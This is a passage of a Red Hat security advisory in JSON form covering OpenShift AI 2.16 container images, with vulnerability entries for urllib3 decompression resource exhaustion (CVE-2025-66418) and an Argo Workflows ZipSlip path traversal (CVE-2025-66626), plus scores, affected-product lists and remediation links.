"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "node-forge: node-forge ASN.1 Unbounded Recursion"
},
{
"cve": "CVE-2025-66418",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-12-05T17:01:20.277857+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2419455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3 Python library that could lead to a Denial of Service condition. A remote, malicious server can exploit this flaw by responding to a client request with an HTTP message that uses an excessive number of chained compression algorithms. This unlimited decompression chain causes the client system to consume a virtually unbounded amount of CPU resources and memory. The high resource usage leads to service disruption, making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66418"
},
{
"category": "external",
"summary": "RHBZ#2419455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66418",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66418"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8",
"url": "https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"
}
],
"release_date": "2025-12-05T16:02:15.271000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion"
},
{
"cve": "CVE-2025-66626",
"cwe": {
"id": "CWE-73",
"name": "External Control of File Name or Path"
},
"discovery_date": "2025-12-09T21:01:10.560389+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2420818"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal and arbitrary file overwrite vulnerability has been identified in Argo Workflows during the extraction of archived artifacts, where symbolic links inside a crafted archive are not safely validated before file extraction. An attacker could exploit this flaw by submitting a malicious archive containing symbolic links that point outside the intended extraction directory, causing files to be written or overwritten in unintended locations within the workflow pod. Successful exploitation may allow an attacker to overwrite execution control files and achieve arbitrary command execution during pod startup.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-workflows: argoproj/argo-workflows is vulnerable to RCE via ZipSlip and symbolic links",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security has rated this issue as High severity (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H, 8.3) because an attacker with basic workflow submission privileges can supply a specially crafted archive that is automatically extracted without proper validation. The attack complexity is low and does not require user interaction once the malicious workflow is submitted. Successful exploitation allows arbitrary file overwrite within the affected pod, including critical execution files, which can result in code execution at pod startup. While the impact is generally limited to the compromised pod and does not directly lead to host-level compromise, the integrity and availability impacts within the container are significant, justifying a High severity rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
